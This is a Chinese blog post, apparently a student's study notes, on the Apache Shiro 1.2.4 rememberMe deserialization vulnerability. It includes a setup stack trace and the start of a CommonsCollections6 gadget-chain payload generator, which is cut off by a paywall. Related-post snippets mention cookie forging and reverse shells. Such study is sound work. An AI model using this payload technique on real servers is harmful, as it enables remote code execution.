Shiro反序列化漏洞学习

最新推荐文章于 2025-05-20 21:09:55 发布
最新推荐文章于 2025-05-20 21:09:55 发布
阅读量1.4k 收藏
点赞数 1
CC 4.0 BY-SA版权
分类专栏: JAVA安全 文章标签: shiro java 安全 反射
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31065143/article/details/117884462
本文详细介绍了Apache Shiro的反序列化漏洞,包括Shiro的基本介绍、环境搭建、利用CommonCollection6进行漏洞复现的过程,以及如何修改利用链以实现命令执行。作者通过实践分享了学习此漏洞的心得体会。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Shiro反序列化漏洞学习

前言

最近临近期末,事情变得很多,到了大二后感觉事情明显变多了,感觉人也很累,已经很久没有更新文章了,记得刚刚开始写博客是大一的时候,刚刚开始写博客也只是瞎搞,慢慢的开始注意到自己不能继续下去,于是就删除了以前的文章。尽管现在的文章质量也还是很低,但是希望自己能够慢慢进步。最近不仅要忙期末考试的事情、还要写项目,开始写项目发现自己的代码功底还是很弱,希望能在大三中改善这点。

shiro简介

简而言之,Apache Shiro 是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、加密和会话管理。

Shiro能到底能做些什么呢?

  • 验证用户身份
  • 用户访问权限控制,比如:1、判断用户是否分配了一定的安全角色。2、判断用户是否被授予完成某个操作的权限
  • 在非 Web 或 EJB 容器的环境下可以任意使用Session API
  • 可以响应认证、访问控制,或者 Session 生命周期中发生的事件
  • 可将一个或以上用户安全数据源数据组合成一个复合的用户 “view”(视图)
  • 支持单点登录(SSO)功能
  • 支持提供“Remember Me”服务,获取用户关联信息而无需登录

具体的就自己去了解吧。

环境搭建

这里用的是p牛的代码,其实刚刚开始打算自己写的,但是弄了好久都一直有一个报错,看了看版本,网上的资料,也没找到原因,报错如下。最后用p牛的代码先学一下,希望以后能够解决这个问题。

Caused by: java.lang.ClassNotFoundException: Unable to load ObjectStreamClass [org.apache.commons.collections.keyvalue.TiedMapEntry: static final long serialVersionUID = -8453869361373831205L;]: 
	at org.apache.shiro.io.ClassResolvingObjectInputStream.resolveClass(ClassResolvingObjectInputStream.java:55) ~[shiro-core-1.2.4.jar:1.2.4]
	at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1984) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1848) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2158) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1665) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:501) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:459) ~[na:1.8.0_281]
	at java.util.HashMap.readObject(HashMap.java:1410) ~[na:1.8.0_281]
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:1.8.0_281]
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[na:1.8.0_281]
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:1.8.0_281]
	at java.lang.reflect.Method.invoke(Method.java:498) ~[na:1.8.0_281]
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1185) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2294) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2185) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1665) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:501) ~[na:1.8.0_281]
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:459) ~[na:1.8.0_281]
	at org.apache.shiro.io.DefaultSerializer.deserialize(DefaultSerializer.java:77) ~[shiro-core-1.2.4.jar:1.2.4]
	... 28 common frames omitted
Caused by: org.apache.shiro.util.UnknownClassException: Unable to load class named [org.apache.commons.collections.keyvalue.TiedMapEntry] from the thread context, current, or system/application ClassLoaders.  All heuristics have been exhausted.  Class could not be found.
	at org.apache.shiro.util.ClassUtils.forName(ClassUtils.java:148) ~[shiro-core-1.2.4.jar:1.2.4]
	at org.apache.shiro.io.ClassResolvingObjectInputStream.resolveClass(ClassResolvingObjectInputStream.java:53) ~[shiro-core-1.2.4.jar:1.2.4]
	... 46 common frames omitted

CommonCollection6

这里用的是cc6的原因也是因为看了p牛的文章,想自己脱离文章试一下。

先改写一下cc6生成payload,cc6.java改的很简单只是使原来的方法改写成返回字节数组的函数,然后再编写一个test.java将返回的字节码利用shiro 1.2.4内置的密钥进行加密,生成命令执行的rememberMe。

cc6.java

import java.io.*;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

public class cc6 {
   
   

    public byte[] getPayload(String command) throws Exception {
   
   

        Transformer Testtransformer = new ChainedTransformer(new Transformer[]{
   
   });

        Transformer[] transformers=new Transformer[]{
   
   
                new ConstantTransformer(Runtime.class),
最低0.47元/天 解锁文章

200万优质内容无限畅学
[Java反序列化]—Shiro反序列化(一)
snowlyzz的博客
12-05 7828
shiro -550 反序列化(一)
shiro反序列化分析
2301_79724395的博客
06-11 1756
Apache Shiro 是一个 Java 安全框架,包括如下功能和特性:Authentication:身份认证/登陆,验证用户是不是拥有相应的身份。在 Shiro 中,所有的操作都是基于当前正在执行的用户,这里称之为一个 Subject,在用户任意代码位置都可以轻易取到这个Subject。
shiro反序列化
weixin_48776804的博客
05-12 1万+
shiro反序列化
PHP、JAVAShiro反序列化
最新发布
myrouya的博客
05-20 1061
Shiro-550 类似,Shiro-721 漏洞也涉及到 RememberMe 功能,但它的 AES 加密密钥通常是随机生成的,不容易被猜测。而漏洞就是出现在这里,我们都知道AES它是一个硬编码,他是有默认密钥的,如果程序员没有去修改或者过于简单,那我们就可以进行cookie重构,先构造我们的恶意代码,然后将恶意代码进行序列化,然后AES加密(密钥我们已经爆破出来了)再进行base64编码,形成我们新的cookie,而服务器在处理时就会按照刚才的处理流程,就会在服务端触发我们构造的恶意代码。
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-16 1万+
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理和漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
漏洞分析 | 经典的Shiro反序列化
2301_80115097的博客
03-26 2515
其实这个还是得学习学习加密解密的方法,才能进行编写poc,但是此处只是了解个思路。具体可参考其他文章;声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!免费领取安全学习资料包!渗透工具技术文档、书籍面试题帮助你在面试中脱颖而出视频基础到进阶环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等应急响应笔记学习路线。
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe Cookie,Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
Shiro反序列化漏洞检测工具
01-05
Apache Shiro是一款强大的Java安全框架,它为...通过了解Shiro反序列化漏洞的原理和防范措施,我们可以更好地保护我们的系统免受此类攻击。同时,使用提供的检测工具进行定期扫描,也能及时发现并修复潜在的安全隐患。
人工智能-项目实践-检测-Apache Shiro 反序列化漏洞检测与利用工具.zip
12-23
Shiro_exploit用于检测与利用Apache Shiro反序列化漏洞脚本。可以帮助企业发现自身安全漏洞。 该脚本通过网络收集到的22个key,利用ysoserial工具中的URLDNS这个Gadget,并结合dnslog平台实现漏洞检测。漏洞利用则...
golang - switch_golang switch,一份非常适合收藏的Golang进阶面试题
2401_84252820的博客
04-15 1039
不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!fmt.Printf(“请输入一个字符:a,b,c,d,e,f,g\n”)请编写一个程序,该程序可以接收一个字符,比如:a,b,c,d,e,f,g。fmt.Println(“您没有按要求输入,请按照要求输入信息”)fmt.Println(“周一”)fmt.Println(“周二”)fmt.Println(“周三”)fmt.Println(“周四”)
shiro反序列化漏洞
2403_82795493的博客
02-19 1399
Apache官方披露Apache Shiro权限绕过漏洞(CVE-2022-32532),当Apache Shiro中使用RegexRequestMatcher进行权限配置,且正则表达式中携带"."时,未经授权的远程攻击者可通过构造恶意数据包绕过身份认证,导致配置的权限验证失效。会存在一段base64加密的字段,解码后就是攻击者的回显内容。shiro721的加密key基本猜不到,系统随机生成,可以使用登陆后的rememberMe去爆破正确的key值,即利用有效的RememberMe Cookie作为。
shiro反序列化漏洞原理与分析
故事讲予风听
10-12 898
原理 AES加密的密钥Key被硬编码在代码里,每个人通过源代码都能拿到AES加密的密钥。因此,攻击者构造一个恶意的对象,并且对其序列化,AES加密,base64编码后,作为cookie的rememberMe字段发送。Shiro将rememberMe进行解密并且反序列化,最终就会造成反序列化漏洞
shiro-反序列化漏洞
weixin_54217950的博客
07-26 6808
shiro反序列化漏洞
Shiro反序列化漏洞测试工具使用指南
- **分析结果**:根据工具提供的报告,分析是否存在Shiro反序列化漏洞,以及漏洞的严重程度。 - **修复漏洞**:如果检测到漏洞,应及时对应用进行修复,包括但不限于更新到安全版本的Shiro框架、修改应用配置,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值